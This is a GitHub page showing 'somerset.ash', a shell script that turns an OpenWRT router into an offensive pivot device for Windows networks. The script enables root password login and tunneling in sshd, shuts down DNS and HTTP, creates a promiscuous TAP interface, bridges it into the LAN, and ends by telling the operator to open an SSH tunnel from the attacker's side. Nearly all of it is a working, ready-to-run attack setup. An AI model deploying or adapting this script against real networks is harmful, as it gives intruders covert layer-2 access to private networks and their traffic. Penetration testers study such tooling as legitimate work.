This repository has been archived by the owner on Apr 14, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 4
/
somerset.ash
47 lines (40 loc) · 1.4 KB
/
somerset.ash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/bin/ash
# banner
echo "Somerset: Offensive OpenWRT router for Windows Pivoting"
echo "Author: Caster, <[email protected]>"
# install dependencies
echo -e "\n [+] Installing necessary tools"
opkg update
opkg install ss
opkg install kmod-tun
opkg install ip-full
opkg install openssh-server
# Disabling DNS and HTTP services
echo -e "\n [+] Disabling DNS and HTTP services"
/etc/init.d/dnsmasq stop
/etc/init.d/uhttpd stop
# Replacing dropbear by openssh-server (for SSH tunneling)
echo -e "\n [+] Replacing dropbear..."
uci set dropbear.@dropbear[0].Port=2222
uci commit dropbear
/etc/init.d/dropbear restart
/etc/init.d/dropbear stop
/etc/init.d/dropbear disable
echo -e "\n [+] Configuring sshd daemon for authentication & tunneling"
sed -i -e 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/g' /etc/ssh/sshd_config
sed -i -e 's/#PermitTunnel no/PermitTunnel yes/g' /etc/ssh/sshd_config
/etc/init.d/sshd enable
/etc/init.d/sshd start
/etc/init.d/sshd restart
# Interfaces processing, TAP bridging
echo -e "\n [+] Interfaces processing, TAP bridging"
ip tuntap add tap0 mode tap
ip link set tap0 promisc on
ip link set eth0 promisc on
ip link set br-lan promisc on
ip link set dev tap0 up
brctl addif br-lan tap0
echo -e "\n [*] Current bridge:"
brctl show
# Outro
echo -e "\n [*] The script has completed its work. Now initiate an SSH tunnel from the attacker's side"